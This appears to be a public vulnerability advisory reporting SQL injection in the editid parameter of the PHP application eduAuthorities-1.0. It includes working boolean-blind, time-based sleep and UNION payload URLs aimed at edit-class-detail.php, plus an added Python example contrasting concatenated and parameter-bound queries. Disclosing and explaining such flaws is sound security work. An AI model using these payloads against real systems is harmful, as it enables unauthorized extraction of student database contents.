## Titles: eduAuthorities-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:

The `editid` parameter appears to be vulnerable to SQL injection attacks. The payloads `15750083 or 4189=04189` and `58006253 or 7709=7710` were each submitted in the `editid` parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results; the reported requests and responses should be reviewed manually to confirm whether a vulnerability is actually present.

Additionally, the payload `(select*from(select(sleep(20)))a)` was submitted in the `editid` parameter. The application took 20011 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay. An attacker can retrieve all information from the system's database through this vulnerability.
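The following is an added example and not code from eduAuthorities or from the original advisory. It models, in Python over an in-memory SQLite table, the lookup that `edit-class-detail.php` presumably performs: one function pastes `editid` into the query text (the unsafe incorporation the description infers), and one validates the identifier and binds it as a parameter. Running the difference-based probe from the description against both shows why the two boolean payloads yield different responses in the first case and identical handling in the second. The table name `class_detail`, its columns and the sample rows are constructed assumptions.

```python
"""Added example (not the application's code): why a concatenated editid
parameter reacts to the boolean payloads quoted above, and how validating and
binding the parameter removes that difference. The table `class_detail`, its
columns and the rows below are assumed, not taken from the application."""
import re
import sqlite3

# Constructed sample data standing in for the application's class table.
SAMPLE_ROWS = [
    (1, "Class A", "Room 101"),
    (2, "Class B", "Room 102"),
    (3, "Class C", "Room 103"),
]


def make_db() -> sqlite3.Connection:
    """Build the in-memory stand-in table and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE class_detail (id INTEGER PRIMARY KEY, name TEXT, room TEXT)"
    )
    conn.executemany("INSERT INTO class_detail VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, editid: str) -> list:
    """Vulnerable pattern: the raw request parameter becomes part of the SQL
    text, so an 'or <true>' tail widens the WHERE clause to every row while an
    'or <false>' tail leaves it matching nothing."""
    sql = f"SELECT id, name, room FROM class_detail WHERE id = {editid}"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, editid: str) -> list:
    """Hardened pattern: reject anything that is not a plain integer, then bind
    the value as a query parameter so the database never parses it as SQL.
    Validation is defence in depth; the binding alone already prevents injection."""
    if not re.fullmatch(r"[0-9]{1,10}", editid):
        raise ValueError("editid must be a positive integer")
    sql = "SELECT id, name, room FROM class_detail WHERE id = ?"
    return conn.execute(sql, (int(editid),)).fetchall()


def difference_based_probe(lookup, conn: sqlite3.Connection) -> bool:
    """The difference-based check from the description: submit a true and a
    false boolean tail that must behave identically when the input is treated
    as data. Returns True when the two responses differ, which is the signal
    the description reports for editid."""
    true_payload = "15750083 or 4189=04189"
    false_payload = "58006253 or 7709=7710"
    try:
        first = lookup(conn, true_payload)
        second = lookup(conn, false_payload)
    except ValueError:
        # Input rejected before it reached the query: nothing to compare.
        return False
    return first != second


if __name__ == "__main__":
    db = make_db()
    print("concatenated query differs:", difference_based_probe(lookup_unsafe, db))
    print("bound query differs:      ", difference_based_probe(lookup_safe, db))
    print("normal lookup:", lookup_safe(db, "2"))
```

The probe is the same true/false pair the advisory quotes; with the concatenated query the first payload returns every row and the second none, while the validated, bound query rejects both before any SQL runs and still serves an ordinary `editid=2` request normally. The same validate-then-bind shape applies to the PHP side with `mysqli` or PDO prepared statements.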
STATUS: HIGH- Vulnerability

[+]Exploits:

- SQLi Multiple:

```mysql
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488 OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)# UiVZfrom(select(sleep(3)))a)

    Type: UNION query
    Title: MySQL UNION query (random number) - 3 columns
    Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962 UNION ALL SELECT 8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)
---
```

## Reproduce:
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)

## More:
[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)

## Time spent: 00:37:00